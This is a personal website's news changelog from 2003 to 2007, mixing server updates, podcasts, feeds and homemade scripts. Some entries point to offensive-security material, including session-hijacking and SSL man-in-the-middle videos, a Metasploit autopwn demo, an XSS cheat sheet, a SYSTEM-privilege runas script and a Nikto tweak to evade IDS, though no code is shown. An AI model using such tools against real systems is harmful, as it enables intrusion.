11/09/2007 - Limit IP downloads in Apache / mod_limitipconn as if mod_bw was not nuff ..
11/08/2007 - Sweet update app for backtrack2 fast-track.py
11/08/2007 - Updated procmon.sfx.exe run M$'s Procmon with REG key SET filter ( great for looking for monitoring key value changes !)
11/07/2007 - sidejacking_hamster.swf VIDEO sweet cookie/sesstion hijack app for M$ ! Errata Security
10/17/2007 - http://www.rhymetorrents.com Nurd rap classic stuff
10/07/2007 - Updated Videos
08/31/2007 - Added cURL at&t login script cingular login script
08/31/2007 - Added Snort Auto update script cURL script to download latest snort rules
08/29/2007 - Updated/Fixed Security feeds 13 total feeds with fulldisclosure feeds.rmccurdy.com
08/29/2007 - Added comic feeds http://rmccurdy.com/comics/
08/26/2007 - Little Snort auto update script to learn cURL/POST etc .. www.binrev.com/forums
08/11/2007 - Flash video to use WebInspect on any host ! WebInspect_7.swf
07/28/2007 - Updated Quick Clean to support firefox ! quickclean.exe
07/20/2007 - Updated/Added Milw0rm Videos http://rmccurdy.com/scripts/
07/20/2007 - Random Myspace Jukebox MS.cgi
07/16/2007 - RIP Lappy 2.0 :( Lappy went POOF the chargerboard blew up so now I have no laptop OR PC.....
07/13/2007 - ALL Sans webcast links updated ! www.sans.org
07/13/2007 - Hack experts exchange
07/13/2007 - Sorry for the down time. I have been having power issues with the server. I put the UPS 1400 battery backup
on this server so if I have any more problems I know it is the power supply
07/13/2007 - Flash video of ANI exploit over SMTP ani.swf
07/13/2007 - Flash video of SSL MITM attack ( HTTPS man in the middle attack sniffing 'secure' connections) Whoppix-ssl-mitm.swf
07/10/2007 - Flash video of Metasploit Autopwn video ( windows 2000 box scanned and owned in seconds ... ) metaspoit autopwn.swf
06/11/2007 - http://proxy.org/proxy.pl?url=http://rmccurdy.com&proxy=random&=+GO+
just change that url to what ever you want to goto anonymously
05/14/2007 - Episode: 239 - Myth TV Today With A Techie
05/10/2007 - NEW SERVER ! Thank you Magee !! Compaq Presario SR1110NX Desktop PC (2.53 GHz Celeron, 256 MB RAM)
05/08/2007 - Added metasploit 3 autopwn video metaspoit 03 autopwn.swf
05/01/2007 - Added runas SYSTEM script RUNAS_SYSTEM.vbs
05/01/2007 - Added shell code to unicode script shell2uni.sh
05/01/2007 - Added ccleaner /AUTO to quick clean and quick secure clean quickclean.exe
04/26/2007 - Updated quick windows cleaner quickclean.exe
04/16/2007 - XSS Cheat Sheet
04/16/2007 - Episode: 232 - portable apps Today With A Techie
03/22/2007 - PNX Video's are out!
03/18/2007 - Fixed an error on the html > rss feeds parser I made and added Frsirt-windows feeds.rmccurdy.com
03/14/2007 - Episode: 217 - Nikto Today With A Techie
02/17/2007 - PHOTOS ! outerz0ne.rmccurdy.com ( Atlanta con )
02/17/2007 - 600 IRC PROXIES ! irc.rmccurdy.com ( IRC from work over firewall )
02/17/2007 - Episode: 207 - You are being watched Today With A Techie
01/18/2007 - Episode: 192 - htaccess Today With A Techie
12/13/2006 - Updated quickdefender.exe Audo install script for Windows Defender / pre fixes/patches
11/27/2006 - Chasers - Trojan Horse
11/21/2006 - Bellsouth's DNS was really slow last night for about 6 hrs. My scripts went haywire
11/16/2006 - Added Lilina News Aggregator
11/09/2006 - "I was amazed at the results. Of the 20 USB drives we planted, 15 were found by employees, and all had been plugged into company computers."
11/03/2006 - Added IBM_EMU_10b.zip Old IBM Keyboard Emulator
11/01/2006 - Updated/Fixed mod_security
10/26/2006 - Ok my video got ban from youtube.com from SPI so here is the new download WebInspect Hack
10/26/2006 - Working on sort of a Cyber-CarPool
10/26/2006 - Ripped the basic enum logs for WebInspect and added them to nikto nikto_extra_scans.db
10/26/2006 - Just added mod_security so let me know if you have any problems gotroot mod_security rules
10/06/2006 - Added Cron updated list of port 80 feeds from shoutcast.com http://www.rmccurdy.com/m3u.m3u
09/25/2006 - Added Aqua Teen Hunger Force ATHF juke box
09/21/2006 - Do not reserve items on ebay ! Read here
09/15/2006 - Added quickdefender.exe Audo install script for Windows Defender / pre fixes/patches
09/20/2006 - Updated quicksnort.exe
09/20/2006 - Added bbs_documentary.html BBS Documentary Interview Collection

Today With a Techie Episode: 157 - SnortSam
Today With a Techie Episode: 144 - Nessus
Today With a Techie Episode: 135 - How to Find a Job Online
Today With a Techie Episode: 130 - UltraVNC
Today With a Techie Episode: 121 - Real Server
Today With a Techie Episode: 113 - Newsgroups

09/15/2006 - Updated Proxy.html / google file search
09/14/2006 - Added rand_myspace.php scripts
09/08/2006 - Finally fixed SnortStats link to not show attacks from the server
09/02/2006 - Updated Comcast script
08/18/2006 - My first Video Tutorial on WebInspect Hack scripts
08/17/2006 - Updated Weather Channel Monitor scripts
07/24/2006 - Fixed/updated nessus script message me for a free account
07/18/2006 - Added WebCalendar
06/14/2006 - Comcast ON DEMAND full 3000+ listing comcast.php
06/22/2006 - Sans webcast link index www.sans.org
06/13/2006 - Setup Asterisk Hotline 360.382.2193
06/13/2006 - Updated Nikto script to help against IDS systems
06/14/2006 - 1st meet with hackduluth.org
05/04/2006 - Currently researching Google hacking
05/02/2006 - I am on for May 15th for Twatech Radio
04/25/2006 - Update quickmirc with latest xdcc script ( Scripts )
04/25/2006 - Update Nessus with Nikto ( Scripts )
04/25/2006 - Added Quick Clean Secure with MRUblaster/sdelete ( Scripts )
04/21/2006 - Update Nessus script and yahoo image script ( under script page )
04/18/2006 - Honda Element Commercial No Pinch
04/17/2006 - Coyboy Bebop - Cat On Mars
04/14/2006 - 1st meet with atlhack.org
04/05/2006 - New Starwars Empire at War v1.3 patch !
03/30/2006 - Fixed snort and flushed logs
03/25/2006 - Podcast using reader.google.com

Radio FreeK America
Security Monkey
T.W.A.T. Radio
Binary Revolution Radio
Security Now!
control alt chicken
Linux Link Tech

03/22/2006 - I got blogged on h0lug.sourceforge.net !
03/20/2006 - Added Galaxietool database for uni 12 and 13 www.galaxietool.de
11/30/2005 - Upgraded IDS to www.snortsam.net
11/18/2005 - Server did not survive the 5.4 > 6.0 update so I did a new install on a 7yr old computer
11/04/2005 - Added quicksnort.exe Quick snort update and auto install snort.org
10/26/2005 - Updated Mindterm ( ssh client )
10/20/2005 - Added bw_mod ( Bandwidth Module ) Updated quickclean.exe and hosts.exe
10/11/2005 - Updated quickclean.exe
09/01/2005 - Updated quicknorton.exe Now AUTO updates !
08/26/2005 - Updated /Support page with new virus definitions in light of recent activity
08/23/2005 - Register of rmccurdy.com and added /Snortstats Intrusion Detection System
07/22/2005 - ISP Account temp suspended due to mail script gone bad
07/27/2005 - Added Opt-out page
07/15/2005 - Server down for MORE Upgrades
07/06/2005 - Server down for Upgrades
06/09/2005 - Updates /bt and added Java /SSH Client
05/30/2005 - Server was down a few days. Linksys switch power supply blew up again so I got a new switch. Updated /bt site
03/23/2005 - Added BT Bit Torrent Help page
03/23/2005 - Updated/Added scripts
03/10/2005 - Added little eye candy
02/24/2005 - Server Down for cleanup
02/21/2005 - Updated Antispam page
10/26/2004 - Server format
03/16/2004 - Added www.daymarerecords.com changed projects layout
01/25/2004 - Added traceroute Perl script to projects
08/29/2003 - Updated projects
07/13/2003 - Updated added 2 sites and changed news page



